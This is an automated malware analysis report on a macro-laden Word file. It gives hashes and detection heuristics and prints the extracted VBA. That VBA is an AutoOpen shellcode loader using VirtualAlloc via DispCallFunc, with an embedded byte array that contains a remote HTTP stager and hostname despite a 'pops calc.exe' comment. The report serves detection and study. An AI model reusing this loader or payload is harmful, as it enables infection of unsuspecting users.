Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ae3b37a68871c3d8…

MALICIOUS

Office (OOXML)

47.5 KB Created: 2021-01-05 15:36:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-23
MD5: 320d982ec328a73579dd628bcb51621e SHA-1: 9ff897bab75b0adf60fad9cdbb14f5a1ea39d7ee SHA-256: ae3b37a68871c3d8d71064efd573d52cc45c602bd4220fd1e766691bc6ae959b
130 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA native-memory callback shellcode loader critical OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADER
    VBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.
    Matched line in script
        lpMemory = stdCallA("kernel32", "VirtualAlloc", vbLong, 0&, UBound(Shellcode3), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.freevbcode.com/ShowCode.asp?ID=1863 In document text (OOXML body / shared strings)
    • http://www.freevbcode.com/ShowCode.asp?ID=1863�In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.htmlIn document text (OOXML body / shared strings)
    • http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.html�In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 17238 bytes
SHA-256: f8bf449b33fb50b941f17c4d590eed611ad60b5edd1081c9ab95188f732b7e98
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OldIsNew"
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long

Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40

Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long

'Credits
'http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.html
'http://www.freevbcode.com/ShowCode.asp?ID=1863
  
Sub Sheldon()
    
    Dim lpMemory As Long
    Dim lResult As Long
    Dim bytestowrite As String
    Dim sizeShellcode As Integer
    Dim sizeShellcode2 As Integer
    'Shellcode pops calc.exe
    Shellcode = Array(Chr(&HFC), Chr(&HE8), Chr(&H89), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H60), Chr(&H89), Chr(&HE5), Chr(&H31), Chr(&HD2), Chr(&H64), Chr(&H8B), Chr(&H52), Chr(&H30), Chr(&H8B), Chr(&H52), Chr(&HC), Chr(&H8B), Chr(&H52), Chr(&H14), Chr(&H8B), Chr(&H72), Chr(&H28), Chr(&HF), Chr(&HB7), Chr(&H4A), Chr(&H26), Chr(&H31), Chr(&HFF), Chr(&H31), Chr(&HC0), Chr(&HAC), Chr(&H3C), _
Chr(&H61), Chr(&H7C), Chr(&H2), Chr(&H2C), Chr(&H20), Chr(&HC1), Chr(&HCF), Chr(&HD), Chr(&H1), Chr(&HC7), Chr(&HE2), Chr(&HF0), Chr(&H52), Chr(&H57), Chr(&H8B), Chr(&H52), Chr(&H10), Chr(&H8B), Chr(&H42), Chr(&H3C), Chr(&H1), Chr(&HD0), Chr(&H8B), Chr(&H40), Chr(&H78), Chr(&H85), Chr(&HC0), Chr(&H74), Chr(&H4A), Chr(&H1), Chr(&HD0), Chr(&H50), Chr(&H8B), Chr(&H48), Chr(&H18), _
Chr(&H8B), Chr(&H58), Chr(&H20), Chr(&H1), Chr(&HD3), Chr(&HE3), Chr(&H3C), Chr(&H49), Chr(&H8B), Chr(&H34), Chr(&H8B), Chr(&H1), Chr(&HD6), Chr(&H31), Chr(&HFF), Chr(&H31), Chr(&HC0), Chr(&HAC), Chr(&HC1), Chr(&HCF), Chr(&HD), Chr(&H1), Chr(&HC7), Chr(&H38), Chr(&HE0), Chr(&H75), Chr(&HF4), Chr(&H3), Chr(&H7D), Chr(&HF8), Chr(&H3B), Chr(&H7D), Chr(&H24), Chr(&H75), Chr(&HE2), _
Chr(&H58), Chr(&H8B), Chr(&H58), Chr(&H24), Chr(&H1), Chr(&HD3), Chr(&H66), Chr(&H8B), Chr(&HC), Chr(&H4B), Chr(&H8B), Chr(&H58), Chr(&H1C), Chr(&H1), Chr(&HD3), Chr(&H8B), Chr(&H4), Chr(&H8B), Chr(&H1), Chr(&HD0), Chr(&H89), Chr(&H44), Chr(&H24), Chr(&H24), Chr(&H5B), Chr(&H5B), Chr(&H61), Chr(&H59), Chr(&H5A), Chr(&H51), Chr(&HFF), Chr(&HE0), Chr(&H58), Chr(&H5F), Chr(&H5A), _
Chr(&H8B), Chr(&H12), Chr(&HEB), Chr(&H86), Chr(&H5D), Chr(&H68), Chr(&H6E), Chr(&H65), Chr(&H74), Chr(&H0), Chr(&H68), Chr(&H77), Chr(&H69), Chr(&H6E), Chr(&H69), Chr(&H54), Chr(&H68), Chr(&H4C), Chr(&H77), Chr(&H26), Chr(&H7), Chr(&HFF), Chr(&HD5), Chr(&HE8), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H31), Chr(&HFF), Chr(&H57), Chr(&H57), Chr(&H57), Chr(&H57), Chr(&H57), _
Chr(&H68), Chr(&H3A), Chr(&H56), Chr(&H79), Chr(&HA7), Chr(&HFF), Chr(&HD5), Chr(&HE9), Chr(&HA4), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H5B), Chr(&H31), Chr(&HC9), Chr(&H51), Chr(&H51), Chr(&H6A), Chr(&H3), Chr(&H51), Chr(&H51), Chr(&H68), Chr(&HBB), Chr(&H1), Chr(&H0), Chr(&H0), Chr(&H53), Chr(&H50), Chr(&H68), Chr(&H57), Chr(&H89), Chr(&H9F), Chr(&HC6), Chr(&HFF), Chr(&HD5), _
Chr(&H50), Chr(&HE9), Chr(&H8C), Chr(&H0), Chr(&H31), Chr(&HD2), Chr(&H52), Chr(&H68), Chr(&H0), Chr(&H32), Chr(&HC0), Chr(&H84), Chr(&H52), Chr(&H52), Chr(&H52), Chr(&H53), Chr(&H52), Chr(&H50), Chr(&H68), Chr(&HEB), Chr(&H55), Chr(&H2E), Chr(&H3B), Chr(&HFF), Chr(&HD5), Chr(&H89), Chr(&HC6), Chr(&H83), Chr(&HC3), Chr(&H50), Chr(&H68), Chr(&H80), _
Chr(&H33), Chr(&H0), Chr(&H0), Chr(&H89), Chr(&HE0), Chr(&H6A), Chr(&H4), Chr(&H50), Chr(&H6A), Chr(&H1F), Chr(&H56), Chr(&H68), Chr(&H75), Chr(&H46), Chr(&H9E), Chr(&H86), Chr(&HFF), Chr(&HD5), Chr(&H5F), Chr(&H31), Chr(&HFF), Chr(&H57), Chr(&H57), Chr(&H6A), Chr(&HFF), Chr(&H53), Chr(&H56), Chr(&H68), Chr(&H2D), Chr(&H6), Chr(&H18), Chr(&H7B), Chr(&HFF), Chr(&HD5), Chr(&H85), _
Chr(&HC0), Chr(&HF), Chr(&H84), Chr(&HCA), Chr(&H1), Chr(&H0), Chr(&H0), Chr(&H31), Chr(&HFF), Chr(&H85), Chr(&HF6), Chr(&H74), Chr(&H4), Chr(&H89), Chr(&HF9), Chr(&HEB), Chr(&H9), Chr(&H68), Chr(&HAA), Chr(&HC5), Chr(&HE2), Chr(&H5D), Chr(&HFF), Chr(&HD5), Chr(&H89), Chr(&HC1), Chr(&H68), Chr(&H45), Chr(&H21), Chr(&H5E), Chr(&H31), Chr(&HFF), Chr(&HD5), Chr(&H31), Chr(&HFF), _
Chr(&H57), Chr(&H6A), Chr(&H7), Chr(&H51), Chr(&H56), Chr(&H50), Chr(&H68), Chr(&HB7), Chr(&H57), Chr(&HE0), Chr(&HB), Chr(&HFF), Chr(&HD5), Chr(&HBF), Chr(&H0), Chr(&H2F), Chr(&H0), Chr(&H0), Chr(&H39), Chr(&HC7), Chr(&H75), Chr(&H7), Chr(&H58), Chr(&H50), Chr(&HE9), Chr(&H7B), Chr(&HFF), Chr(&HFF), Chr(&HFF), Chr(&H31), Chr(&HFF), Chr(&HE9), Chr(&H91), Chr(&H1), Chr(&H0), _
Chr(&H0), Chr(&HE9), Chr(&HC9), Chr(&H1), Chr(&H0), Chr(&H0), Chr(&HE8), Chr(&H6F), Chr(&HFF), Chr(&HFF), Chr(&HFF), Chr(&H2F), Chr(&H36), Chr(&H6F), Chr(&H68), Chr(&H4F), Chr(&H0), Chr(&H15), Chr(&HB1), Chr(&H1D), Chr(&H3C), Chr(&H80), Chr(&H56), Chr(&H5E), Chr(&H15), Chr(&HF7), Chr(&H8F), Chr(&H3A), Chr(&HF9), Chr(&HC8), Chr(&HD0), Chr(&H81), Chr(&H93), Chr(&H76), Chr(&HF7))

    Shellcode2 = Array(Chr(&H30), Chr(&HCE), Chr(&H6D), Chr(&H6B), Chr(&H10), Chr(&HC8), Chr(&HE2), Chr(&H96), Chr(&HE8), Chr(&H97), Chr(&H1F), Chr(&H55), Chr(&H76), Chr(&H1B), Chr(&H2E), Chr(&H63), Chr(&HF), Chr(&HC0), Chr(&HE2), Chr(&H7A), Chr(&H3A), Chr(&H92), Chr(&HED), Chr(&HB8), Chr(&HC9), Chr(&H50), Chr(&HCD), Chr(&HBD), Chr(&HBF), Chr(&HA0), Chr(&H80), Chr(&H33), Chr(&H89), Chr(&H15), Chr(&HA), _
Chr(&HB8), Chr(&HEC), Chr(&HBA), Chr(&HFB), Chr(&HFA), Chr(&H92), Chr(&H65), Chr(&HE2), Chr(&H71), Chr(&H5), Chr(&H9A), Chr(&H23), Chr(&HFA), Chr(&H90), Chr(&HF), Chr(&HC7), Chr(&HCB), Chr(&H8D), Chr(&HFA), Chr(&H9B), Chr(&H0), Chr(&H55), Chr(&H73), Chr(&H65), Chr(&H72), Chr(&H2D), Chr(&H41), Chr(&H67), Chr(&H65), Chr(&H6E), Chr(&H74), Chr(&H3A), Chr(&H20), Chr(&H4D), Chr(&H6F), _
Chr(&H7A), Chr(&H69), Chr(&H6C), Chr(&H6C), Chr(&H61), Chr(&H2F), Chr(&H35), Chr(&H2E), Chr(&H30), Chr(&H20), Chr(&H28), Chr(&H57), Chr(&H69), Chr(&H6E), Chr(&H64), Chr(&H6F), Chr(&H77), Chr(&H73), Chr(&H20), Chr(&H4E), Chr(&H54), Chr(&H20), Chr(&H36), Chr(&H2E), Chr(&H31), Chr(&H3B), Chr(&H20), Chr(&H57), Chr(&H4F), Chr(&H57), Chr(&H36), Chr(&H34), Chr(&H3B), Chr(&H20), Chr(&H54), _
Chr(&H72), Chr(&H69), Chr(&H64), Chr(&H65), Chr(&H6E), Chr(&H74), Chr(&H2F), Chr(&H37), Chr(&H2E), Chr(&H30), Chr(&H3B), Chr(&H20), Chr(&H72), Chr(&H76), Chr(&H3A), Chr(&H31), Chr(&H31), Chr(&H2E), Chr(&H30), Chr(&H29), Chr(&H20), Chr(&H6C), Chr(&H69), Chr(&H6B), Chr(&H65), Chr(&H20), Chr(&H47), Chr(&H65), Chr(&H63), Chr(&H6B), Chr(&H6F), Chr(&HD), Chr(&HA), Chr(&H0), Chr(&HAD), _
Chr(&HD7), Chr(&H81), Chr(&H50), Chr(&H91), Chr(&HD2), Chr(&H63), Chr(&HD7), Chr(&H35), Chr(&H3), Chr(&HA), Chr(&H55), Chr(&HB7), Chr(&HD5), Chr(&H1A), Chr(&H57), Chr(&HCB), Chr(&HD), Chr(&HDF), Chr(&HDF), Chr(&H7F), Chr(&HAA), Chr(&H40), Chr(&HB2), Chr(&H7D), Chr(&H48), Chr(&H8F), Chr(&HF8), Chr(&H85), Chr(&HB3), Chr(&HF7), Chr(&HAB), Chr(&HBC), Chr(&HEE), Chr(&H11), Chr(&HAD), _
Chr(&H49), Chr(&H4E), Chr(&H3B), Chr(&H5E), Chr(&HE2), Chr(&H3B), Chr(&HC0), Chr(&H8D), Chr(&H50), Chr(&H12), Chr(&H63), Chr(&HC7), Chr(&HEB), Chr(&H83), Chr(&H9C), Chr(&HC6), Chr(&HC4), Chr(&H7E), Chr(&HD), Chr(&HA5), Chr(&H5F), Chr(&H1C), Chr(&H96), Chr(&H43), Chr(&HB5), Chr(&HAB), Chr(&H14), Chr(&HA8), Chr(&HCD), Chr(&H22), Chr(&H3B), Chr(&H4A), Chr(&H22), Chr(&HDF), Chr(&HDE), _
Chr(&H2A), Chr(&H89), Chr(&H93), Chr(&H8B), Chr(&HC3), Chr(&HA0), Chr(&H4E), Chr(&HDC), Chr(&H2), Chr(&H29), Chr(&H71), Chr(&HCE), Chr(&HBC), Chr(&HEC), Chr(&HD9), Chr(&H1C), Chr(&H21), Chr(&H3A), Chr(&HBD), Chr(&HB7), Chr(&H76), Chr(&H83), Chr(&H29), Chr(&H0), Chr(&HF6), Chr(&H4C), Chr(&H25), Chr(&H4F), Chr(&H7), Chr(&HA8), Chr(&H29), Chr(&H4E), Chr(&H1D), Chr(&HB3), Chr(&HBE), _
Chr(&H11), Chr(&HB2), Chr(&HB), Chr(&HAF), Chr(&H45), Chr(&H62), Chr(&HC1), Chr(&H16), Chr(&H4D), Chr(&HDA), Chr(&H65), Chr(&HDD), Chr(&HC2), Chr(&H7F), Chr(&H57), Chr(&HE8), Chr(&H80), Chr(&H59), Chr(&HDE), Chr(&HB2), Chr(&H95), Chr(&HF0), Chr(&HC2), Chr(&H6F), Chr(&HD5), Chr(&HB4), Chr(&HDA), Chr(&H3A), Chr(&H3B), Chr(&HAF), Chr(&H4B), Chr(&HEF), Chr(&H40), Chr(&H3), Chr(&HDE), _
Chr(&HE2), Chr(&H15), Chr(&H2D), Chr(&H41), Chr(&H5D), Chr(&HBF), Chr(&H6B), Chr(&H2C), Chr(&HF6), Chr(&H47), Chr(&HF1), Chr(&H6C), Chr(&HF0), Chr(&HEE), Chr(&H4F), Chr(&HB7), Chr(&H24), Chr(&H31), Chr(&H7D), Chr(&H93), Chr(&HBD), Chr(&HD7), Chr(&H4F), Chr(&H92), Chr(&H19), Chr(&HB8), Chr(&H47), Chr(&H2D), Chr(&H98), Chr(&H86), Chr(&H5A), Chr(&H85), Chr(&H1F), Chr(&HD0), Chr(&H6D), _
Chr(&H4A), Chr(&HF4), Chr(&HB0), Chr(&H7F), Chr(&HDF), Chr(&H2D), Chr(&H85), Chr(&H68), Chr(&HFE), Chr(&H4F), Chr(&H74), Chr(&HA5), Chr(&H8A), Chr(&H33), Chr(&HFE), Chr(&H3), Chr(&H76), Chr(&H23), Chr(&HDA), Chr(&HB9), Chr(&H47), Chr(&HBC), Chr(&H68), Chr(&H8D), Chr(&HD), Chr(&H17), Chr(&H33), Chr(&HAC), Chr(&H4), Chr(&HFB), Chr(&H56), Chr(&H42), Chr(&H47), Chr(&HA4), Chr(&HF8), _
Chr(&H13), Chr(&HB0), Chr(&HA0), Chr(&HAD), Chr(&HBD), Chr(&HCD), Chr(&H2F), Chr(&HDC), Chr(&HBF), Chr(&H0), Chr(&H68), Chr(&HF0), Chr(&HB5), Chr(&HA2), Chr(&H56), Chr(&HFF), Chr(&HD5), Chr(&H6A), Chr(&H40), Chr(&H68), Chr(&H0), Chr(&H10), Chr(&H0), Chr(&H0), Chr(&H68), Chr(&H0), Chr(&H0), Chr(&H40), Chr(&H0), Chr(&H57), Chr(&H68), Chr(&H58), Chr(&HA4), Chr(&H53), Chr(&HE5), _
Chr(&HFF), Chr(&HD5), Chr(&H93), Chr(&HB9), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H1), Chr(&HD9), Chr(&H51), Chr(&H53), Chr(&H89), Chr(&HE7), Chr(&H57), Chr(&H68), Chr(&H0), Chr(&H20), Chr(&H0), Chr(&H0), Chr(&H53), Chr(&H56), Chr(&H68), Chr(&H12), Chr(&H96), Chr(&H89), Chr(&HE2), Chr(&HFF), Chr(&HD5), Chr(&H85), Chr(&HC0), Chr(&H74), Chr(&HC6), Chr(&H8B), Chr(&H7), _
Chr(&H1), Chr(&HC3), Chr(&H75), Chr(&HE5), Chr(&H58), Chr(&HC3), Chr(&HE8), Chr(&H89), Chr(&HFD), Chr(&HFF), Chr(&HFF), Chr(&H61), Chr(&H6C), Chr(&H6C), Chr(&H2E), Chr(&H61), Chr(&H74), Chr(&H77), Chr(&H77), Chr(&H6E), Chr(&H65), Chr(&H74), Chr(&H2E), Chr(&H63), Chr(&H6F), Chr(&H6D), Chr(&H0), Chr(&H47), Chr(&H76), Chr(&H9F), Chr(&HFD))
    
    Dim Shellcode3() As String
    ' Shellcode 1 = 383 en Ubound donc de 0 à 383 donc size = 384
    sizeShellcode = UBound(Shellcode) + 1
    For iShellcode = LBound(Shellcode) To UBound(Shellcode)
        ReDim Preserve Shellcode3(iShellcode)
        copyValue = Shellcode(iShellcode)
        Shellcode3(iShellcode) = copyValue
    Next iShellcode
    
    For iShellcode2 = LBound(Shellcode2) To UBound(Shellcode2)
        ReDim Preserve Shellcode3(iShellcode2 + sizeShellcode)
        copyValue = Shellcode2(iShellcode2)
        Shellcode3(sizeShellcode + iShellcode2) = copyValue
    Next iShellcode2
 
    lpMemory = stdCallA("kernel32", "VirtualAlloc", vbLong, 0&, UBound(Shellcode3), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    
    For iArray = LBound(Shellcode3) To UBound(Shellcode3)
        bytestowrite = Shellcode3(iArray)
        lResult = stdCallA("kernel32", "RtlMoveMemory", vbLong, lpMemory + iArray, bytestowrite, 1)
    Next iArray
    'lResult = stdCallA("kernel32", "CreateThread", vbLong, 0&, 0&, lpMemory, 0&, 0&, 0&)

End Sub

Public Function stdCallA(sDll As String, sFunc As String, ByVal RetType As VbVarType, ParamArray P() As Variant)
    Dim i As Long, pFunc As Long, V(), HRes As Long
    ReDim V(0)
    V = P
    For i = 0 To UBound(V)
        If VarType(P(i)) = vbString Then P(i) = StrConv(P(i), vbFromUnicode): V(i) = StrPtr(P(i))
            VType(i) = VarType(V(i))
            VPtr(i) = VarPtr(V(i))
        Next i
    HRes = DispCallFunc(0, GetProcAddress(LoadLibrary(sDll), sFunc), CC_STDCALL, RetType, i, VType(0), VPtr(0), stdCallA)
End Function

Function retrievePayload()
    Set Content = ActiveDocument.Content
    Debug.Print Content
    'Decode64 Content
    'Decrypt RC4
    'Decode64 Content
End Function

Function formatPayload()

End Function

Sub AutoOpen()
    Sheldon
End Sub

Attribute VB_Name = "ComptabilityUtility"
Option Explicit

Private Const clOneMask = 16515072          '000000 111111 111111 111111
Private Const clTwoMask = 258048            '111111 000000 111111 111111
Private Const clThreeMask = 4032            '111111 111111 000000 111111
Private Const clFourMask = 63               '111111 111111 111111 000000

Private Const clHighMask = 16711680         '11111111 00000000 00000000
Private Const clMidMask = 65280             '00000000 11111111 00000000
Private Const clLowMask = 255               '00000000 00000000 11111111

Private Const cl2Exp18 = 262144             '2 to the 18th power
Private Const cl2Exp12 = 4096               '2 to the 12th
Private Const cl2Exp6 = 64                  '2 to the 6th
Private Const cl2Exp8 = 256                 '2 to the 8th
Private Const cl2Exp16 = 65536              '2 to the 16th

Public Function Decode64(ByVal sString As String) As String

    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long

    sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
    sString = Replace(sString, vbLf, vbNullString)      'either order.

    lTemp = Len(sString) Mod 4                          'Test for valid input.
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If

    If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
        iPad = 1
    End If

    For lTemp = 0 To 255                                'Fill the translation table.
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65              'A - Z
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71              'a - z
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4               '1 - 0
            Case 43
                bTrans(lTemp) = 62                      'Chr(43) = "+"
            Case 47
                bTrans(lTemp) = 63                      'Chr(47) = "/"
        End Select
    Next lTemp

    For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp

    bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.

    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
        lTemp = lQuad And clHighMask                    'Mask for the first byte
        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
        lTemp = lQuad And clMidMask                     'Mask for the second byte
        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
        lPos = lPos + 3
    Next lChar

    sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
    Decode64 = sOut

End Function

Function RunRC4(sMessage, strKey)
    Dim kLen, x, y, i, j, temp
    Dim s(256), k(256)
     
        'Init keystream
    kLen = Len(strKey)
    For i = 0 To 255
            s(i) = i
            k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
    Next
     
        j = 0
    For i = 0 To 255
            j = (j + k(i) + s(i)) Mod 256
            temp = s(i)
            s(i) = s(j)
            s(j) = temp
    Next
     
        x = 0
        y = 0
     
        'Drop n bytes from keystream
    For i = 1 To 3072
            x = (x + 1) Mod 256
            y = (y + s(x)) Mod 256
            temp = s(x)
            s(x) = s(y)
            s(y) = temp
    Next
     
        'Encode/Decode
    For i = 1 To Len(sMessage)
            x = (x + 1) Mod 256
            y = (y + s(x)) Mod 256
            temp = s(x)
            s(x) = s(y)
            s(y) = temp
     
            RunRC4 = RunRC4 & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
    Next
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 151040 bytes
SHA-256: a922ed66bcca7fe74c203b40f9c3af1d427cb0943e98e7e60badfee38b31af9c

Open this report in the interactive analyzer, or submit your own file for analysis.